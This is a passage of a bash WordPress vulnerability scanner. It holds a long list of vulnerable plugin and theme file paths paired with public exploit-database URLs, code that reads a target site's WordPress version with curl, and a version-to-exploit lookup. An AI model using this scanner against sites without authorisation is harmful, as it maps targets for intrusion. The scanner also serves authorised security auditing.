- vulns[48]="wp-content/plugins/page-flip-image-gallery/books/getConfig.php"
- vulns[49]="wp-content/plugins/wp-shopping-cart/image_processing.php"
- vulns[50]="mediaHolder.php"
- vulns[51]="wp-content/plugins/st_newsletter/stnl_iframe.php"
- vulns[52]="wp-content/plugins/downloads-manager/upload.php"
- vulns[53]="wp-content/plugins/wpSS/ss_load.php"
- vulns[54]="wp-content/plugins/wp-download/wp-download.php"
- vulns[55]="wp-content/plugins/sniplets/modules/syntax_highlight.php"
- vulns[56]="wp-content/plugins/wp-photo-album/wppa.php"
- vulns[57]="wp-content/plugins/simple-forum/sf-includes.php"
- vulns[58]="wp-content/plugins/simple-forum/sf-includes.php"
- vulns[59]="wp-content/plugins/st_newsletter/shiftthis-preview.php"
- vulns[60]="wp-content/plugins/wordspew/wordspew-rss.php"
- vulns[61]="wp-content/plugins/dmsguestbook/dmsguestbook.php"
- vulns[62]="wp-content/plugins/wassup/spy.php"
- vulns[63]="wp-content/plugins/wp-adserve/adclick.php"
- vulns[64]="wp-content/plugins/fgallery/fim_rss.php"
- vulns[65]="wp-content/plugins/wp-cal/functions/editevent.php"
- vulns[66]="wp-content/plugins/wp-forum/wp-forum.php"
- vulns[67]="wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php"
- vulns[68]="wp-content/plugins/pictpress/resize.php"
- vulns[69]="wp-content/plugins/BackUp/Archive.php"
- vulns[70]="wp-content/plugins/myflash/myflash-button.php"
- vulns[71]="wp-content/plugins/wordtube/wordtube-button.php"
- vulns[72]="wp-content/plugins/wp-table/js/wptable-button.php"
- vulns[73]="wp-content/plugins/mygallery/mygallery.php"
- vulns[74]="wp-content/plugins/Enigma2.php"
- vulns[75]="wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html"
- vulns[76]="wp-content/themes/THEME/timthumb.php"
- vulns[77]="wp-content/plugins/wp-e-commerce/wpsc-theme/functions/wpsc-user_log_functions.php"
- vulns[78]="wp-content/plugins/ungallery/source_vuln.php"
- vulns[79]="wp-content/plugins/wp-menu-creator/updateSortOrder.php"
- vulns[80]="wp-content/plugins/mm-duplicate/mm-duplicate.php"
- vulns[81]="wp-content/plugins/sendit/submit.php"
- vulns[82]="wp-content/plugins/photoracer/viewimg.php"
- vulns[83]="wp-content/plugins/easy-comment-uploads/upload-form.php"
- vulns[84]="wp-content/plugins/allow-php-in-posts-and-pages/alter.php"
- vulns[85]="wp-content/plugins/ajaxgallery/utils/list.php"
- vulns[86]="wp-content/plugins/wpforum/sendmail.php"
- vulns[87]="wp-content/plugins/wp-ds-faq/ajax.php"
- vulns[88]="wp-content/plugins/easy-contact-form-lite/requests/sort_row.request.php"
- vulns[89]="wp-content/plugins/wp-symposium/uploadify/get_profile_avatar.php"
- vulns[90]="wp-content/plugins/contus-hd-flv-player/process-sortable.php"
- vulns[91]="wp-content/plugins/file-groups/download.php"
- vulns[92]="wp-content/plugins/wp-css/wp-css-compress.php"
- vulns[93]="wp-content/plugins/mm-forms-community/includes/edit_details.php"
- vulns[94]="wp-content/plugins/js-appointment/searchdata.php"
- vulns[95]="wp-content/plugins/oqey-headers/oqey_settings.php"
- vulns[96]="wp-content/plugins/fbpromotions/fbActivate.php"
- vulns[97]="wp-content/plugins/profiles/library/bio-img.php"
- vulns[98]="wp-content/plugins/evarisk/include/ajax.php"
- vulns[99]="wp-content/plugins/mystat/mystat.php"
- vulns[100]="wp-content/plugins/sh-slideshow/ajax.php"
- vulns[101]="wp-content/plugins/copyright-licensing-tools/icopyright_xml.php"
- vulns[102]="wp-content/plugins/advertizer/click_ads.php"
- vulns[103]="wp-content/plugins/event-registration/event_registration_export.php"
- vulns[104]="wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php"
- vulns[105]="wp-content/plugins/wp-audio-gallery-playlist/playlist.php"
- vulns[106]="wp-content/plugins/yolink-search/includes/bulkcrawl.php"
- vulns[107]="wp-content/plugins/pure-html/alter.php"
- vulns[108]="wp-content/plugins/couponer/print-coupon.php"
- vulns[109]="wp-content/plugins/grapefile/grapeupload.php"
- vulns[110]="wp-content/plugins/image-gallery-with-slideshow/upload-file.php"
- vulns[111]="wp-content/plugins/wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg/exporttocsv.php"
- vulns[112]="wp-content/plugins/wp-bannerize/ajax_clickcounter.php"
- vulns[113]="wp-content/plugins/search-autocomplete/includes/tags.php"
- vulns[114]="wp-content/plugins/videowhisper-video-presentation/vp/c_status.php"
- vulns[115]="wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php"
- vulns[116]="wp-content/plugins/zotpress/zotpress.rss.php"
- vulns[117]="wp-content/plugins/oqey-gallery/getimages.php"
- vulns[118]="wp-content/plugins/tweet-old-post/tweet-old-post.php"
- vulns[119]="wp-content/plugins/post-highlights/ajax/ph_settings.php"
- vulns[120]="wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php"
- vulns[121]="wp-content/plugins/scormcloud/ajax.php"
- vulns[122]="wp-content/plugins/eventify/php/ajax/fetcheventdetails.php"
- vulns[123]="wp-content/plugins/paid-downloads/download.php"
- vulns[124]="wp-content/plugins/community-events/tracker.php"
- vulns[125]="wp-content/plugins/1-flash-gallery/upload.php"
- vulns[126]="wp-content/plugins/wp-filebase/wpfb-ajax.php"
- vulns[127]="wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php"
- vulns[128]="wp-content/plugins/events-2/"
- vulns[129]="wp-content/plugins/tune-library/tune-library-ajax.php"
- vulns[130]="wp-content/plugins/forum-server/wpf-insert.php"
- vulns[131]="wp-content/plugins/wp-e-commerce/wp-shopping-cart.php"
- vulns[132]="wp-content/plugins/count-per-day/notes.php"
- vulns[133]="wp-content/plugins/filedownload/download.php"
- vulns[134]="wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"
- vulns[135]="wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php"
- vulns[136]="wp-content/plugins/wpeasystats/export.php"
- vulns[137]="wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"
- vulns[138]="wp-content/plugins/livesig/livesig-ajax-backend.php"
- vulns[139]="wp-content/plugins/disclosure-policy-plugin/functions/action.php"
- vulns[140]="wp-content/plugins/mailz/lists/config/config.php"
- vulns[141]="wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"
- vulns[142]="wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"
- vulns[143]="wp-content/plugins/relocate-upload/relocate-upload.php"
- vulns[144]="wp-content/plugins/category-grid-view-gallery/includes/timthumb.php"
- vulns[145]="wp-content/plugins/auto-attachments/thumb.php"
- vulns[146]="wp-content/plugins/wp-marketplace/libs/timthumb.php"
- vulns[147]="wp-content/plugins/dp-thumbnail/timthumb/timthumb.php"
- vulns[148]="wp-content/plugins/vk-gallery/lib/timthumb.php"
- vulns[149]="wp-content/plugins/rekt-slideshow/picsize.php"
- vulns[150]="wp-content/plugins/cac-featured-content/timthumb.php"
- vulns[151]="wp-content/plugins/rent-a-car/libs/timthumb.php"
- vulns[152]="wp-content/plugins/lisl-last-image-slider/timthumb.php"
- vulns[153]="wp-content/plugins/islidex/js/timthumb.php"
- vulns[154]="wp-content/plugins/kino-gallery/timthumb.php"
- vulns[155]="wp-content/plugins/cms-pack/timthumb.php"
- vulns[156]="wp-content/plugins/a-gallery/timthumb.php"
- vulns[157]="wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php"
- vulns[158]="wp-content/plugins/really-easy-slider/inc/thumb.php"
- vulns[159]="wp-content/plugins/verve-meta-boxes/tools/timthumb.php"
- vulns[160]="wp-content/plugins/user-avatar/user-avatar-pic.php"
- vulns[161]="wp-content/plugins/extend-wordpress/helpers/timthumb/image.php"
- vulns[162]="wp-content/plugins/link-library/link-library-ajax.php"
- vulns[163]="wp-content/plugins/adrotate/adrotate-out.php"
- vulns[164]="wp-content/plugins/cevhershare/cevhershare-admin.php"
- vulns[165]="wp-content/plugins/mingle-forum/wpf-insert.php"
- vulns[166]="wp-content/plugins/wp-bannerize/ajax_sorter.php"
- vulns[167]="wp-content/plugins/wp-spamfree/js/wpsf-js.php"
- vulns[168]="wp-content/plugins/gd-star-rating/export.php"
- vulns[169]="wp-content/plugins/contact-form-wordpress/easy-form.class.php"
- vulns[170]="wp-content/plugins/wp-photo-album-plus/wppa-functions.php"
- vulns[171]="wp-content/plugins/backwpup/job/wp_export_generate.php"
- vulns[172]="wp-content/themes/classipress/index.php"
- vulns[173]="wp-content/plugins/wp-glossary/ajax.php"
- vulns[174]="wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php"
- vulns[175]="wp-content/plugins/adrotate/adrotate-out.php"
- vulns[176]="wp-content/plugins/jetpack/modules/sharedaddy.php"
- vulns[177]="wp-content/plugins/universal-post-manager/bycat.php"
- vulns[178]="wp-content/plugins/mailz/lists/dl.php"
- vulns[179]="wp-content/plugins/pay-with-tweet.php/pay.php"
- vulns[180]="wp-content/plugins/age-verification/age-verification.php"
- vulns[181]="wp-content/plugins/wp-autoyoutube/modules/index.php"
- vulns[182]="wp-content/plugins/count-per-day/download.php"
- vulns[183]="wp-content/plugins/ucan-post/"
- vulns[184]="wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php"
- vulns[185]="wp-content/plugins/zingiri-web-shop/zing.inc.php"
- vulns[186]="wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
- vulns[187]="wp-content/plugins/wpmarketplace/uploadify/uploadify.php"
- vulns[188]="wp-content/plugins/store-locator-le/core/load_wp_config.php"
- vulns[189]="wp-content/plugins/html5avmanager/lib/uploadify/custom.php"
- vulns[190]="wp-content/plugins/foxypress/uploadify/uploadify.php"
- vulns[191]="wp-content/plugins/asset-manager/upload.php"
- vulns[192]="wp-content/plugins/font-uploader/font-upload.php"
- vulns[193]="wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php"
- vulns[194]="wp-content/plugins/gallery-plugin/upload/php.php"
- vulns[195]="wp-content/plugins/front-end-upload/upload.php"
- vulns[196]="wp-content/plugins/omni-secure-files/plupload/examples/upload.php"
- vulns[197]="wp-content/plugins/wpstorecart/php/upload.php"
- vulns[198]="wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"
- vulns[199]="wp-content/plugins/thinkun-remind/exportData.php"
- vulns[200]="wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"
- vulns[201]="wp-content/plugins/rbxgallery/uploader.php"
- vulns[202]="wp-content/plugins/plugin-newsletter/preview.php"
- vulns[203]="wp-content/plugins/pica-photo-gallery/picadownload.php"
- vulns[204]="wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php"
- vulns[205]="wp-content/plugins/front-file-manager/upload.php"
- vulns[206]="wp-content/plugins/content-flow3d/"
- vulns[207]="wp-content/plugins/custom-content-type-manager/upload_form.php"
- vulns[208]="wp-content/plugins/drag-drop-file-uploader/dnd-upload.php"
- vulns[209]="wp-content/plugins/mac-dock-gallery/upload-file.php"
- vulns[210]="wp-content/plugins/pica-photo-gallery/picaPhotosResize.php"
- vulns[211]="wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php"
- vulns[212]="wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php"
- vulns[213]="wp-content/plugins/user-meta/framework/helper/uploader.php"
- vulns[214]="wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php"
- vulns[215]="wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html"
- vulns[216]="wp-content/plugins/buddypress/bp-loader.php"
- vulns[217]="wp-content/plugins/mowpop/submit.php"
- vulns[218]="wp-content/plugins/taggator/taggator.php"
- vulns[219]="wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html"
- vulns[220]="advanced-search.php"
- vulns[221]="wp-content/plugins/email-before-download/email-before-download.php"
- vulns[222]="wp-content/themes/3dcubes/index.php"
- vulns[223]="wp-content/plugins/HT-Poi/file_upload.php"
- vulns[224]="wp-content/plugins/wp-easy-gallery/wp-easy-gallery.php"
- vulns[225]="wp-content/plugins/imagedrop/ImageDrop.php"
- vulns[226]="wp-content/plugins/ss-downloads/services/getfile.php"
- vulns[227]="wp-content/plugins/custom-background/uploadify/uploadify.php"
- vulns[228]="wp-content/plugins/placester/js/uploadify/uploadify.php"
- vulns[229]="wp-content/themes/photocrati-theme/admin/upload_edit.php"
- vulns[230]="wp-content/plugins/katalyst-timthumb/timthumb.php"
- vulns[231]="wp-content/plugins/wp-automatic/inc/csv.php"
- vulns[232]="wp-content/plugins/arcadepress/php/upload.php"
- vulns[233]="wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php"
- vulns[234]="wp-content/plugins/wp-imagezoom/download.php"
- vulns[235]="wp-content/plugins/lim4wp/includes/upload.php"
- vulns[236]="wp-content/themes/famous/megaframe/megapanel/inc/upload.php"
- vulns[237]="wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php"
- vulns[238]="wp-content/plugins/organizer/page/users.php"
- vulns[239]="wp-content/plugins/super-capcha/super-capcha.php"
- vulns[240]="wp-content/plugins/testimonials/testimonials.php"
- vulns[241]="wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html"
- vulns[242]="wp-content/plugins/media-library-categories/sort.php"
- # Wordpress Plugins Reference
- ref[0]="http://www.exploit-db.com/exploits/17207/"
- ref[1]="http://www.exploit-db.com/exploits/16273/"
- ref[2]="http://www.exploit-db.com/exploits/17465/"
- ref[3]="http://www.exploit-db.com/exploits/17465/"
- ref[4]="http://www.exploit-db.com/exploits/17423/ : http://www.exploit-db.com/exploits/18039/"
- ref[5]="http://www.exploit-db.com/exploits/17299/"
- ref[6]="http://www.exploit-db.com/exploits/17284/"
- ref[7]="http://www.exploit-db.com/exploits/17214/"
- ref[8]="http://www.exploit-db.com/exploits/17056/"
- ref[9]="http://www.exploit-db.com/exploits/16947/"
- ref[10]="http://www.exploit-db.com/exploits/17119/"
- ref[11]="http://www.exploit-db.com/exploits/16251/"
- ref[12]="http://www.exploit-db.com/exploits/16250/"
- ref[13]="http://www.exploit-db.com/exploits/16236/"
- ref[14]="http://www.exploit-db.com/exploits/16235/"
- ref[15]="http://www.exploit-db.com/exploits/16233/"
- ref[16]="http://www.exploit-db.com/exploits/16232/"
- ref[17]="http://www.exploit-db.com/exploits/16221/"
- ref[18]="http://www.exploit-db.com/exploits/16218/"
- ref[19]="http://www.exploit-db.com/exploits/16181/"
- ref[20]="http://www.exploit-db.com/exploits/16144/"
- ref[21]="http://www.exploit-db.com/exploits/15943/ : http://www.1337day.com/exploits/17826"
- ref[22]="http://www.exploit-db.com/exploits/15858/"
- ref[23]="http://www.exploit-db.com/exploits/15808/"
- ref[24]="http://www.exploit-db.com/exploits/15684/"
- ref[25]="http://www.exploit-db.com/exploits/15513/"
- ref[26]="http://www.exploit-db.com/exploits/14923/"
- ref[27]="http://www.exploit-db.com/exploits/14541/"
- ref[28]="http://www.exploit-db.com/exploits/14308/"
- ref[29]="http://www.exploit-db.com/exploits/14441/"
- ref[30]="http://www.exploit-db.com/exploits/14198/"
- ref[31]="http://www.exploit-db.com/exploits/14057/"
- ref[32]="http://www.exploit-db.com/exploits/12098/"
- ref[33]="http://www.exploit-db.com/exploits/11458/"
- ref[34]="http://www.exploit-db.com/exploits/10929/"
- ref[35]="http://www.exploit-db.com/exploits/10535/"
- ref[36]="http://www.exploit-db.com/exploits/10325/"
- ref[37]="http://www.exploit-db.com/exploits/10228/"
- ref[38]="http://www.exploit-db.com/exploits/10090/"
- ref[39]="http://www.exploit-db.com/exploits/9431/"
- ref[40]="http://www.exploit-db.com/exploits/9150/"
- ref[41]="http://www.exploit-db.com/exploits/9054/"
- ref[42]="http://www.exploit-db.com/exploits/9048/"
- ref[43]="http://www.exploit-db.com/exploits/9043/"
- ref[44]="http://www.exploit-db.com/exploits/8961/"
- ref[45]="http://www.exploit-db.com/exploits/8791/"
- ref[46]="http://www.exploit-db.com/exploits/8229/"
- ref[47]="http://www.exploit-db.com/exploits/7738/"
- ref[48]="http://www.exploit-db.com/exploits/7543/"
- ref[49]="http://www.exploit-db.com/exploits/6867/"
- ref[50]="http://www.exploit-db.com/exploits/6842/"
- ref[51]="http://www.exploit-db.com/exploits/6777/"
- ref[52]="http://www.exploit-db.com/exploits/6127/"
- ref[53]="http://www.exploit-db.com/exploits/5486/"
- ref[54]="http://www.exploit-db.com/exploits/5326/"
- ref[55]="http://www.exploit-db.com/exploits/5194/"
- ref[56]="http://www.exploit-db.com/exploits/5135/"
- ref[57]="http://www.exploit-db.com/exploits/5126/"
- ref[58]="http://www.exploit-db.com/exploits/5127/"
- ref[59]="http://www.exploit-db.com/exploits/5053/"
- ref[60]="http://www.exploit-db.com/exploits/5039/"
- ref[61]="http://www.exploit-db.com/exploits/5035/"
- ref[62]="http://www.exploit-db.com/exploits/5017/"
- ref[63]="http://www.exploit-db.com/exploits/5013/"
- ref[64]="http://www.exploit-db.com/exploits/4993/"
- ref[65]="http://www.exploit-db.com/exploits/4992/"
- ref[66]="http://www.exploit-db.com/exploits/4939/"
- ref[67]="http://www.exploit-db.com/exploits/4844/"
- ref[68]="http://www.exploit-db.com/exploits/4695/"
- ref[69]="http://www.exploit-db.com/exploits/4593/"
- ref[70]="http://www.exploit-db.com/exploits/3828/"
- ref[71]="http://www.exploit-db.com/exploits/3825/"
- ref[72]="http://www.exploit-db.com/exploits/3824/"
- ref[73]="http://www.exploit-db.com/exploits/3814/"
- ref[74]="http://www.exploit-db.com/exploits/3051/"
- ref[75]="http://www.1337day.com/exploits/16488"
- ref[76]="http://www.exploit-db.com/exploits/17602/"
- ref[77]="http://www.exploit-db.com/exploits/17613/ : http://packetstormsecurity.org/files/view/103724/wpecommerce-xss.txt"
- ref[78]="http://www.exploit-db.com/exploits/17704/"
- ref[79]="http://www.exploit-db.com/exploits/17689/"
- ref[80]="http://www.exploit-db.com/exploits/17707/"
- ref[81]="http://www.exploit-db.com/exploits/17716/"
- ref[82]="http://www.exploit-db.com/exploits/17720/ : http://www.exploit-db.com/exploits/17731/"
- ref[83]="http://www.1337day.com/exploits/16720"
- ref[84]="http://www.1337day.com/exploits/16718"
- ref[85]="http://www.1337day.com/exploits/16716"
- ref[86]="http://www.1337day.com/exploits/16711"
- ref[87]="http://www.1337day.com/exploits/16710"
- ref[88]="http://www.1337day.com/exploits/16708"
- ref[89]="http://www.1337day.com/exploits/16707 : http://www.1337day.com/exploits/18565"
- ref[90]="http://www.1337day.com/exploits/16706"
- ref[91]="http://www.1337day.com/exploits/16705"
- ref[92]="http://www.1337day.com/exploits/16756"
- ref[93]="http://www.exploit-db.com/exploits/17725/"
- ref[94]="http://www.exploit-db.com/exploits/17724/"
- ref[95]="http://www.exploit-db.com/exploits/17730/"
- ref[96]="http://www.exploit-db.com/exploits/17737/"
- ref[97]="http://www.exploit-db.com/exploits/17739/"
- ref[98]="http://www.exploit-db.com/exploits/17738/"
- ref[99]="http://www.exploit-db.com/exploits/17740/"
- ref[100]="http://www.exploit-db.com/exploits/17748/"
- ref[101]="http://www.exploit-db.com/exploits/17749/"
- ref[102]="http://www.exploit-db.com/exploits/17750/"
- ref[103]="http://www.exploit-db.com/exploits/17751/"
- ref[104]="http://www.exploit-db.com/exploits/17755/"
- ref[105]="http://www.exploit-db.com/exploits/17756/"
- ref[106]="http://www.exploit-db.com/exploits/17757/"
- ref[107]="http://www.exploit-db.com/exploits/17758/"
- ref[108]="http://www.exploit-db.com/exploits/17759/"
- ref[109]="http://www.exploit-db.com/exploits/17760/"
- ref[110]="http://www.exploit-db.com/exploits/17761/"
- ref[111]="http://www.exploit-db.com/exploits/17763/"
- ref[112]="http://www.exploit-db.com/exploits/17764/"
- ref[113]="http://www.exploit-db.com/exploits/17767/"
- ref[114]="http://www.exploit-db.com/exploits/17771/"
- ref[115]="http://www.exploit-db.com/exploits/17773/"
- ref[116]="http://www.exploit-db.com/exploits/17778/"
- ref[117]="http://www.exploit-db.com/exploits/17779/"
- ref[118]="http://www.exploit-db.com/exploits/17789/"
- ref[119]="http://www.exploit-db.com/exploits/17790/"
- ref[120]="http://www.exploit-db.com/exploits/17791/"
- ref[121]="http://www.exploit-db.com/exploits/17793/"
- ref[122]="http://www.exploit-db.com/exploits/17794/"
- ref[123]="http://www.exploit-db.com/exploits/17797/"
- ref[124]="http://www.exploit-db.com/exploits/17798/"
- ref[125]="http://www.exploit-db.com/exploits/17801/"
- ref[126]="http://www.exploit-db.com/exploits/17808/"
- ref[127]="http://www.exploit-db.com/exploits/17809/"
- ref[128]="http://www.exploit-db.com/exploits/17814/"
- ref[129]="http://www.exploit-db.com/exploits/17816/"
- ref[130]="http://www.exploit-db.com/exploits/17828/"
- ref[131]="http://www.exploit-db.com/exploits/17832/"
- ref[132]="http://www.exploit-db.com/exploits/17857/"
- ref[133]="http://www.exploit-db.com/exploits/17858/"
- ref[134]="http://www.exploit-db.com/exploits/17860/ : http://www.1337day.com/exploits/18018"
- ref[135]="http://www.exploit-db.com/exploits/17861/"
- ref[136]="http://www.exploit-db.com/exploits/17862/"
- ref[137]="http://www.exploit-db.com/exploits/17863/"
- ref[138]="http://www.exploit-db.com/exploits/17864/"
- ref[139]="http://www.exploit-db.com/exploits/17865/"
- ref[140]="http://www.exploit-db.com/exploits/17866/"
- ref[141]="http://www.exploit-db.com/exploits/17867/ : http://www.1337day.com/exploits/18015"
- ref[142]="http://www.exploit-db.com/exploits/17868/"
- ref[143]="http://www.exploit-db.com/exploits/17869/"
- ref[144]="http://www.exploit-db.com/exploits/17872/"
- ref[145]="http://www.exploit-db.com/exploits/17872/"
- ref[146]="http://www.exploit-db.com/exploits/17872/"
- ref[147]="http://www.exploit-db.com/exploits/17872/"
- ref[148]="http://www.exploit-db.com/exploits/17872/"
- ref[149]="http://www.exploit-db.com/exploits/17872/"
- ref[150]="http://www.exploit-db.com/exploits/17872/"
- ref[151]="http://www.exploit-db.com/exploits/17872/"
- ref[152]="http://www.exploit-db.com/exploits/17872/"
- ref[153]="http://www.exploit-db.com/exploits/17872/"
- ref[154]="http://www.exploit-db.com/exploits/17872/"
- ref[155]="http://www.exploit-db.com/exploits/17872/"
- ref[156]="http://www.exploit-db.com/exploits/17872/"
- ref[157]="http://www.exploit-db.com/exploits/17872/"
- ref[158]="http://www.exploit-db.com/exploits/17872/"
- ref[159]="http://www.exploit-db.com/exploits/17872/"
- ref[160]="http://www.exploit-db.com/exploits/17872/"
- ref[161]="http://www.exploit-db.com/exploits/17872/"
- ref[162]="http://www.exploit-db.com/exploits/17887/"
- ref[163]="http://www.exploit-db.com/exploits/17888/"
- ref[164]="http://www.exploit-db.com/exploits/17891/"
- ref[165]="http://www.exploit-db.com/exploits/17894/ : http://www.1337day.com/exploits/17826"
- ref[166]="http://www.exploit-db.com/exploits/17906/"
- ref[167]="http://www.exploit-db.com/exploits/17970/"
- ref[168]="http://www.exploit-db.com/exploits/17973/"
- ref[169]="http://www.exploit-db.com/exploits/17980/"
- ref[170]="http://www.exploit-db.com/exploits/17983/"
- ref[171]="http://www.exploit-db.com/exploits/17987/"
- ref[172]="http://www.exploit-db.com/exploits/18053/"
- ref[173]="http://www.exploit-db.com/exploits/18055/"
- ref[174]="http://www.exploit-db.com/exploits/18111/ : http://www.1337day.com/exploits/18015"
- ref[175]="http://www.exploit-db.com/exploits/18114/"
- ref[176]="http://www.exploit-db.com/exploits/18126/"
- ref[177]="http://www.exploit-db.com/exploits/18231/"
- ref[178]="http://www.exploit-db.com/exploits/18276/"
- ref[179]="http://www.exploit-db.com/exploits/18330/"
- ref[180]="http://www.exploit-db.com/exploits/18350/"
- ref[181]="http://www.exploit-db.com/exploits/18353/"
- ref[182]="http://www.exploit-db.com/exploits/18355/"
- ref[183]="http://www.exploit-db.com/exploits/18390/"
- ref[184]="http://www.exploit-db.com/exploits/18412/"
- ref[185]="http://www.exploit-db.com/exploits/18787/ : http://www.exploit-db.com/exploits/18806/ : http://www.1337day.com/exploits/18015"
- ref[186]="http://www.exploit-db.com/exploits/18987/"
- ref[187]="http://www.exploit-db.com/exploits/18988/"
- ref[188]="http://www.exploit-db.com/exploits/18989/"
- ref[189]="http://www.exploit-db.com/exploits/18990/"
- ref[190]="http://www.exploit-db.com/exploits/18991/ : http://www.exploit-db.com/exploits/19100/"
- ref[191]="http://www.exploit-db.com/exploits/18993/"
- ref[192]="http://www.exploit-db.com/exploits/18994/"
- ref[193]="http://www.exploit-db.com/exploits/18997/ : http://www.1337day.com/exploits/18471"
- ref[194]="http://www.exploit-db.com/exploits/18998/"
- ref[195]="http://www.exploit-db.com/exploits/19008/"
- ref[196]="http://www.exploit-db.com/exploits/19009/"
- ref[197]="http://www.exploit-db.com/exploits/19023/"
- ref[198]="http://www.exploit-db.com/exploits/19022/"
- ref[199]="http://www.exploit-db.com/exploits/19021/"
- ref[200]="http://www.exploit-db.com/exploits/19020/"
- ref[201]="http://www.exploit-db.com/exploits/19019/"
- ref[202]="http://www.exploit-db.com/exploits/19018/"
- ref[203]="http://www.exploit-db.com/exploits/19016/"
- ref[204]="http://www.exploit-db.com/exploits/19013/"
- ref[205]="http://www.exploit-db.com/exploits/19012/"
- ref[206]="http://www.exploit-db.com/exploits/19036/"
- ref[207]="http://www.exploit-db.com/exploits/19058/"
- ref[208]="http://www.exploit-db.com/exploits/19057/"
- ref[209]="http://www.exploit-db.com/exploits/19056/"
- ref[210]="http://www.exploit-db.com/exploits/19055/"
- ref[211]="http://www.exploit-db.com/exploits/19054/"
- ref[212]="http://www.exploit-db.com/exploits/19053/"
- ref[213]="http://www.exploit-db.com/exploits/19052/"
- ref[214]="http://www.exploit-db.com/exploits/19050/"
- ref[215]="http://www.1337day.com/exploits/17860"
- ref[216]="http://www.1337day.com/exploits/17906"
- ref[217]="http://www.1337day.com/exploits/17931"
- ref[218]="http://www.1337day.com/exploits/17992"
- ref[219]="http://www.1337day.com/exploits/17994"
- ref[220]="http://www.1337day.com/exploits/18012"
- ref[221]="http://www.1337day.com/exploits/18049"
- ref[222]="http://www.1337day.com/exploits/18371"
- ref[223]="http://www.1337day.com/exploits/18444"
- ref[224]="http://www.1337day.com/exploits/18496"
- ref[225]="http://www.1337day.com/exploits/18529"
- ref[226]="http://www.1337day.com/exploits/18530"
- ref[227]="http://www.1337day.com/exploits/18566"
- ref[228]="http://www.1337day.com/exploits/18567"
- ref[229]="http://www.1337day.com/exploits/18586"
- ref[230]="http://www.1337day.com/exploits/18589"
- ref[231]="http://www.exploit-db.com/exploits/19187/"
- ref[232]="http://www.1337day.com/exploits/18668"
- ref[233]="http://www.1337day.com/exploits/18684"
- ref[234]="http://www.1337day.com/exploits/18685"
- ref[235]="http://www.1337day.com/exploits/18686"
- ref[236]="http://www.1337day.com/exploits/18687"
- ref[237]="http://www.1337day.com/exploits/18688"
- ref[238]="http://www.1337day.com/exploits/18133"
- ref[239]="http://www.exploit-db.com/exploits/17728/"
- ref[240]="http://www.exploit-db.com/exploits/17729/"
- ref[241]="http://packetstorm.interhost.co.il/1203-exploits/wpdeans-shell.txt"
- ref[242]="http://www.exploit-db.com/exploits/17628/"
- OIFS=$IFS
- IFS=""
- XPLC="0" # Number of Vulnerable Plugins Found
- XPL="" # Vulnerable Plugins Found
- XPLR="" # Vulnerable Plugins Found Ref.
- TOTALTEST=${#vulns[@]}
- let "TOTALTEST -= 1" # Total Tested Plugins
- echo
- echo -e "$YELLOW Scanning $web for the vulnerability"
- echo -e "$RED Let the scanner scans till it finishes so that it can dump the Results in a txt Document ^_^"
- echo -e "$YELLOW <^>-------------------Scanning Result--------------------<^>"
- echo
- echo -e "$YELLOW[+] Website :- \e[0m $web "
- echo -e "$YELLOW[+] Vulnerable Plugins in Our Database :- \e[0m $TOTALTEST"
- #Wordpress Version finder
- VERSION=`$CURL --url $web/readme.html 2> /dev/null | $GREP Version | $CUT -b 17-`
- echo
- echo -e "$GREEN [+] Wordpress Version:-\e[0m $VERSION"
- echo
- # Wordpress version exploit
- if [[ $VERSION == "" || $VERSION == null ]]; then
- echo
- echo -e "$RED Wordpress Scanner is not able to recognize the $web Wordpress Version"
- echo -en " Check it Manually (Y/n):$GREEN "
- read CHOSEN
- echo
- if [[ $CHOSEN == "N" || $CHOSEN == "n" ]]; then
- echo
- echo " Exiting WP-Version scanner"
- echo
- exit
- elif [[ $CHOSEN -ne "Y" && $CHOSEN -ne "y" ]]; then
- echo
- echo " Option Not available :P"
- echo " Bye ;-("
- echo
- exit
- fi
- else
- echo
- echo -e "$YELLOW <^>List of Exploit Versions<^>-$BLUE"
- echo
- case $VERSION in
- 3.4.2)
- echo -e " $STRXPL http://packetstormsecurity.org/files/116785/WordPress-3.4.2-Cross-Site-Request-Forgery.html (= 3.4.2)"
- ;;
- 3.4)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/18791/ (<= 3.4)"
- ;;
- 3.3.2)
- echo -e " $STRXPL http://www.1337day.com/exploits/18435/ (= 3.3.2)"
- echo
- ;;
- 3.3.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/18791/ (= 3.3.1)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/18417/ (<= 3.3.1)"
- echo
- ;;
- 3.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/18417/ (<= 3.3.1)"
- echo
- ;;
- 3.2.1)
- echo -e " $STRXPL http://www.1337day.com/exploits/16740 (= 3.2.1)"
- echo
- ;;
- 3.2)
- ;;
- 3.1.4)
- ;;
- 3.1.3)
- ;;
- 3.1.2)
- ;;
